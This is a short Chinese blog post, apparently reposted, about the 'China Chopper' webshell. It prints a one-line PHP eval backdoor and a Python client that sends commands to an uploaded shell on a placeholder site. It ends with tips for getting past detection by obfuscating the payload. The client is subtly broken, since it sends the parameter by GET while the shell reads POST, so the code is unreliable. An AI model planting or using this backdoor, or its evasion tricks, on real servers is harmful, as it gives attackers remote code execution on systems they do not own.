首页 > 代码库 > 关于中国菜刀,如何"切菜"
关于中国菜刀,如何"切菜"
0x00 菜
关于一句话木马肯定是眼熟能详,一句话木马如下:
<?PHP eval($_POST[w]);?>
0x01 刀
一把西瓜刀如下:
# -*-coding=utf-8-*-
# /usr/bin/python
import sys
import requests
def encodePayload(payload):
#请尽情蹂躏payload
return str(payload)
cmd = sys.argv[1]
payload = encodePayload(cmd)
url = "www.xxx.com/1.php?w="+ payload
req = requests.get(url)
print req.text
本质上算是代码注入。
0x02 如果进行绕过呢?
需要人员在满足编程语法规则上,尽情蹂躏代码。举个栗子:编码转换、字符串拼接、特殊符号等等。
博主正在想栗子...
关于中国菜刀,如何"切菜"
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。